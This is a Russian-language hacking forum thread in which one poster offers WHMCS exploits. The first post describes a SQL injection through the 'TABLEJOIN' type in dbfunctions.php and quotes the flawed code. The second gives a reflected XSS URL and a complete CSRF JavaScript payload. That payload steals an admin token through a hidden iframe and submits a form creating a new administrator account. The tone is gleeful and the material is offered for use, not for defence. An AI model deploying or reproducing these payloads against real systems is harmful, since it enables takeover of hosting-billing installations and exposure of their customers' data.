Старый 19.10.2013, 11:07   #1
sniffer
 
Регистрация: 25.06.2013
Сообщений: 2
Репутация: -1
По умолчанию WHMCS Vulnerability

Here We Go again Po0r WHMCS new version again got exploited!

THIS TIME IT'S again the same mistake in

/includes/dbfunctions.php

WE Can manipulate the GET/POST variables and end up with something like $key = array('sqltype' => 'TABLEJOIN', 'value' = '[SQLI]');

FROM THIS VULNERABILITY
WE CAN EVEN change /configuration.php whatever we want (PHP code included)

Код:
$value) {
        $key = db_make_safe_field($origkey);
        if (is_array($value)) {
            if ($key == 'default') {
            $key = '`default`';
            }
            if ($value['sqltype'] == 'LIKE') {
            $criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\'';
            continue;
            }
            if ($value['sqltype'] == 'NEQ') {
            $criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\'';
            continue;
            }
            if ($value['sqltype'] == '>') {
            $criteria[] = $key . '>' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '=') {
            $criteria[] = $origkey . '>=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == 'TABLEJOIN') {
            $criteria[] = $key . '=' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == 'IN') {
            $criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')';
            continue;
            }
            continue;
        }
[...] 
?>
SO Re-edit Your Previous WHMCS.py exploit script and ENJOY!
Original Source :WHMCS 5.2.8 Vulnerability ? localhost
sniffer вне форума   Ответить с цитированием
Старый 30.10.2013, 09:40   #2
sniffer
 
Регистрация: 25.06.2013
Сообщений: 2
Репутация: -1
Cool WHMCS XSS/CSRF

Код:
#XSS ~ CSRF WHMCS All Versions

#XSS
localhost/whmcs/dologin.php?data=<script>alert(1);</script>

#CSRF

document.write('<iframe id="iframe" src="admin/configadmins.php" onload="mast3r()"></iframe>');
function mast3r()
{
    var token =  document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.write('<form name="mast3r" id="mast3r" action="admin/configadmins.php?action=save&id=" method="post">');
    document.write('<input type="hidden" value="'+token+'" name="token">');
    document.write('<input type="text" name="roleid" value="1">');
    document.write('<input type="text" value="ts" size="30" name="firstname">');
    document.write('<input type="text" value="ts" size="30" name="lastname">');
    document.write('<input type="text" value="MM@shame.cc" size="50" name="email">');
    document.write('<input type="text" value="Mast3r" size="25" name="username">');
    document.write('<input type="password" value="p4ssw0rd" size="20" name="password">');
    document.write('<input type="password" value="p4ssw0rd" size="20" name="password2">');
    document.write('<textarea rows="4" cols="80" name="signature">m1</textarea>');
    document.write('<textarea rows="4" cols="80" name="notes">test</textarea>');
    document.write('<input type="text" value="blend" name="template">');
    document.write('<input value="English" type="text" name="language">');
    document.write('<input type="text" value="1" name="ticketnotifications">');
    document.write('</form>');
    document.mast3r.submit();
} 

#
sniffer вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot